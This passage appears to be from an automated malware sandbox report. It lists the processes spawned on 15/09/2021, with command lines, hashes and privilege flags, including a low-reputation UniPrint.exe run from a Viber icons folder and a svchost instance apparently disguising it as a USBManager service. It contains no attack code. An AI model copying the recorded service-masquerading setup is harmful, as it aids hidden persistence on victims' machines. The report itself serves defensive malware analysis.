                                                                                                      Commandline:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      Imagebase:0x400000
                                                                                                      File size:4375848 bytes
                                                                                                      MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:low

                                                                                                      General

                                                                                                      Start time:13:45:13
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff7488e0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:13:45:14
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                      Imagebase:0x7ff7488e0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:13:45:14
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                                      Imagebase:0x7ff7488e0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:13:45:15
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                      Imagebase:0x7ff7488e0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      General

                                                                                                      Start time:13:45:17
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                      Imagebase:0x7ff7488e0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      General

                                                                                                      Start time:13:45:19
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                      Imagebase:0x7ff7488e0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      General

                                                                                                      Start time:13:45:19
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                      Imagebase:0x7ff770ce0000
                                                                                                      File size:163336 bytes
                                                                                                      MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      General

                                                                                                      Start time:13:45:20
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'uniprint.exe' -s USBManager
                                                                                                      Imagebase:0x1220000
                                                                                                      File size:44520 bytes
                                                                                                      MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      General

                                                                                                      Start time:13:45:20
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                      Imagebase:0x7ff7488e0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      General

                                                                                                      Start time:13:45:28
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff7488e0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      General

                                                                                                      Start time:13:45:32
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
                                                                                                      Imagebase:0x400000
                                                                                                      File size:4375848 bytes
                                                                                                      MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      General

                                                                                                      Start time:13:45:39
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      Imagebase:0x400000
                                                                                                      File size:4375848 bytes
                                                                                                      MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      General

                                                                                                      Start time:13:45:41
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
                                                                                                      Imagebase:0x400000
                                                                                                      File size:4375848 bytes
                                                                                                      MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      General

                                                                                                      Start time:13:45:51
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      Imagebase:0x400000
                                                                                                      File size:4375848 bytes
                                                                                                      MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      General

                                                                                                      Start time:13:46:21
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                                                                                                      Imagebase:0x7ff7dafe0000
                                                                                                      File size:455656 bytes
                                                                                                      MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      General

                                                                                                      Start time:13:46:22
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff6b2800000
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Disassembly

                                                                                                      Code Analysis
